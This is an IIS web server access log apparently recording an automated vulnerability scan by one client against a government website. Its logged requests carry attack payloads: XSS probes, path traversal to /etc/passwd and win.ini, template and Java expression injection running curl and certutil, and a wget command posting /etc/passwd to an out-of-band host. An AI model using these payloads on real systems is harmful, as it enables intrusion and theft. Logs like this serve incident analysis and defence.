Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 375 2023-11-09 22:58:16 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 385 2023-11-09 22:58:43 103.153.214.94 POST /graphql - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 1864 2023-11-09 22:58:51 103.153.214.94 POST /webtools/control/xmlrpc - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 364 2023-11-09 22:59:07 103.153.214.94 GET /admingui/version/serverTasksGeneral serverTasksGeneral.GeneralWebserverTabs.TabHref=2 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 0 2 380 2023-11-09 22:59:10 103.153.214.94 GET /admingui/version/serverConfigurationsGeneral serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 370 2023-11-09 22:59:33 103.153.214.94 GET /index.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 366 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-09 23:01:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-09 23:01:26 103.153.214.94 POST /upload - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 362 2023-11-09 23:03:37 103.153.214.94 GET /actions/seomatic/meta-container/meta-link-container/ uri={{228*'98'}} 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 365 2023-11-09 23:03:41 103.153.214.94 GET /actions/seomatic/meta-container/all-meta-containers uri={{228*'98'}} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 364 2023-11-09 23:03:59 103.153.214.94 POST /storfs-asup - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 369 2023-11-09 23:04:25 103.153.214.94 POST /upload - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 376 2023-11-09 23:04:57 103.153.214.94 GET /info.html - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 364 2023-11-09 23:05:40 103.153.214.94 GET /info.html - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 401 2023-11-09 23:05:40 103.153.214.94 GET /plugins/servlet/svnwebclient/changedResource.jsp url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 361 2023-11-09 23:05:44 103.153.214.94 GET /plugins/servlet/svnwebclient/commitGraph.jsp %27)%3Balert(%22XSS 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 361 2023-11-09 23:05:47 103.153.214.94 GET /plugins/servlet/svnwebclient/commitGraph.jsp url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 362 2023-11-09 23:05:51 103.153.214.94 GET /plugins/servlet/svnwebclient/error.jsp errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 363 2023-11-09 23:05:53 103.153.214.94 GET /cache/backup/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 360 2023-11-09 23:05:54 103.153.214.94 GET /plugins/servlet/svnwebclient/statsItem.jsp url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 370 2023-11-09 23:06:48 103.153.214.94 GET /cgi-bin/luci/site_access/ url=%22%20onfocus=alert(document.domain)%20autofocus=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 382 2023-11-09 23:06:57 103.153.214.94 POST /apply_sec.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 363 2023-11-09 23:07:21 103.153.214.94 GET /info.html - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 361 2023-11-09 23:07:24 103.153.214.94 GET /cgi/cgi_i_filter.js _tn={{trimprefix(base64_decode(httoken), 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 361 2023-11-09 23:08:10 103.153.214.94 POST /cgi-bin/readycloud_control.cgi 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 390 2023-11-09 23:08:58 103.153.214.94 GET /ACSServer/DownloadFileServlet show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 368 2023-11-09 23:09:01 103.153.214.94 GET /ACSServer/DownloadFileServlet show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 363 2023-11-09 23:09:23 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 366 2023-11-09 23:09:26 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 363 2023-11-09 23:09:38 103.153.214.94 POST /apply_sec.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 370 2023-11-09 23:09:41 103.153.214.94 POST /apply_sec.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 394 2023-11-09 23:11:00 103.153.214.94 POST /cgi-bin/mt/mt-xmlrpc.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 367 2023-11-09 23:14:15 103.153.214.94 GET /api/getServices name[]=$(wget%20--post-file%20/etc/passwd%20cl6fbhsfe7k9sg331pogyex6r61i7ni17.oast.pro) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 740 2023-11-09 23:14:36 103.153.214.94 POST /auth/realms/master/clients-registrations/default - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 1399 2023-11-09 23:14:38 103.153.214.94 POST /auth/realms/master/clients-registrations/openid-connect - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 362 2023-11-09 23:14:40 103.153.214.94 POST /realms/master/clients-registrations/default - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 366 2023-11-09 23:14:42 103.153.214.94 POST /realms/master/clients-registrations/openid-connect - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 368 2023-11-09 23:14:49 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 363 2023-11-09 23:15:15 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 367 2023-11-09 23:15:34 103.153.214.94 POST /wp-json/buddypress/v1/signup - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 815 2023-11-09 23:16:44 103.153.214.94 GET /goform/goform_get_cmd_process cmd=psw_fail_num_str 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 http://interact.sh/127.0.0.1.html 200 0 0 366 2023-11-09 23:16:56 103.153.214.94 GET /php/telnet_form.php hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 392 2023-11-09 23:17:09 103.153.214.94 GET /Schemas/${''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("id")')} - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 23:17:40 103.153.214.94 GET /php/ssh_form.php hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 360 2023-11-09 23:17:50 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/whatever 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 361 2023-11-09 23:17:55 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/../../../context/2XwZKySL80wCfagSr10rC5PbQzd.cfm 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 364 2023-11-09 23:17:57 103.153.214.94 POST /lucee/2XwZKySL80wCfagSr10rC5PbQzd.cfm - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 366 2023-11-09 23:19:03 103.153.214.94 GET /php/device_graph_page.php graph=%22zlo%20onerror=alert(1)%20%22 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 381 2023-11-09 23:19:34 103.153.214.94 GET /php/device_graph_page.php device_id=%22zlo%20onerror=alert(1)%20%22 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 363 2023-11-09 23:20:59 103.153.214.94 GET /manage/log/view filename=/windows/win.ini&base=../../../../../../../../../../ 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 375 2023-11-09 23:21:02 103.153.214.94 GET /log/view filename=/windows/win.ini&base=../../../../../../../../../../ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 362 2023-11-09 23:21:04 103.153.214.94 GET /manage/log/view filename=/etc/passwd&base=../../../../../../../../../../ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 362 2023-11-09 23:21:07 103.153.214.94 GET /log/view filename=/etc/passwd&base=../../../../../../../../../../ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 363 2023-11-09 23:21:42 103.153.214.94 GET /php/device_graph_page.php is2sim=%22zlo%20onerror=alert(1)%20%22 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 404 2023-11-09 23:22:01 103.153.214.94 GET /php/ping.php hostname=|dir 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 364 2023-11-09 23:22:23 103.153.214.94 GET /messages - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 367 2023-11-09 23:23:49 103.153.214.94 GET /cf_scripts/scripts/ajax/package/cfajax.js - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 393 2023-11-09 23:23:52 103.153.214.94 GET /cf-scripts/scripts/ajax/package/cfajax.js - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1117 2023-11-09 23:23:52 103.153.214.94 GET /ui/vropspluginui/rest/services/getstatus - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 368 2023-11-09 23:23:54 103.153.214.94 GET /CFIDE/scripts/ajax/package/cfajax.js - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 367 2023-11-09 23:23:56 103.153.214.94 GET /cfide/scripts/ajax/package/cfajax.js - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 364 2023-11-09 23:24:02 103.153.214.94 GET /CF_SFSD/scripts/ajax/package/cfajax.js - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 368 2023-11-09 23:24:04 103.153.214.94 GET /cfide-scripts/ajax/package/cfajax.js - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 370 2023-11-09 23:24:05 103.153.214.94 GET /ui/vropspluginui/rest/services/getvcdetails - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 362 2023-11-09 23:24:05 103.153.214.94 GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 364 2023-11-09 23:24:14 103.153.214.94 POST /casa/nodes/thumbprints - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 361 2023-11-09 23:24:49 103.153.214.94 POST /logupload logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 2304 2023-11-09 23:24:53 103.153.214.94 POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 821 2023-11-09 23:25:30 103.153.214.94 POST /index.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 2309 2023-11-09 23:25:32 103.153.214.94 POST /adminer.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 364 2023-11-09 23:25:34 103.153.214.94 POST /adminer/adminer.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 0 2 363 2023-11-09 23:25:36 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 375 2023-11-09 23:25:37 103.153.214.94 POST /adminer/index.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 2 1479 2023-11-09 23:25:39 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 362 2023-11-09 23:25:40 103.153.214.94 POST /_adminer.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 400 2023-11-09 23:25:42 103.153.214.94 POST /_adminer/index.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 364 2023-11-09 23:25:54 103.153.214.94 GET /Catalog/BlobHandler.ashx Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 364 2023-11-09 23:26:11 103.153.214.94 POST /_bulk - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 386 2023-11-09 23:27:17 103.153.214.94 GET /users/sign_in - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 367 2023-11-09 23:27:21 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 368 2023-11-09 23:27:23 103.153.214.94 POST /analytics/telemetry/ph/api/hyper/send _c&_i=test 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 363 2023-11-09 23:27:40 103.153.214.94 GET /error3 msg=30&data=';alert('document.domain');// 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 363 2023-11-09 23:27:42 103.153.214.94 GET /omni_success cmdb_edit_path=");alert('document.domain');// 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 364 2023-11-09 23:27:49 103.153.214.94 POST /api/v4/ci/lint include_merged_yaml=true 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 0 2 2210 2023-11-09 23:28:23 103.153.214.94 POST /AdminService/urest/v1/LogonResource - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 371 2023-11-09 23:28:30 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("curl+http:/cl6fbhsfe7k9sg331pog4hcdtngxnyy9c.oast.pro")}__::.x/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 363 2023-11-09 23:28:32 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("certutil+-urlcache+-split+-f+http:/cl6fbhsfe7k9sg331pogd4qwqphyigd9k.oast.pro")}__::.x/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 361 2023-11-09 23:30:25 103.153.214.94 GET /cgi-bin/cgiServer worker=IndexNew 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 365 2023-11-09 23:31:11 103.153.214.94 POST /api/v1/method.callAnon/getPasswordPolicy - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 0 2 411 2023-11-09 23:32:58 103.153.214.94 GET /wp-admin/admin.php page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 364 2023-11-09 23:33:37 103.153.214.94 GET /wp-admin/admin-ajax.php action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=" 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 369 2023-11-09 23:33:54 103.153.214.94 POST /mgmt/shared/authn/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 394 2023-11-09 23:36:41 103.153.214.94 GET /wp-content/plugins/jh-404-logger/readme.txt - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 366 2023-11-09 23:36:46 103.153.214.94 GET /wp-content/plugins/phastpress/phast.php service=scripts&src=https%3A%2F%2Finteract.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 371 2023-11-09 23:37:19 103.153.214.94 GET /wp-login.php login-error=<script>alert(document.domain)</script> 443 - 101.35.195.134 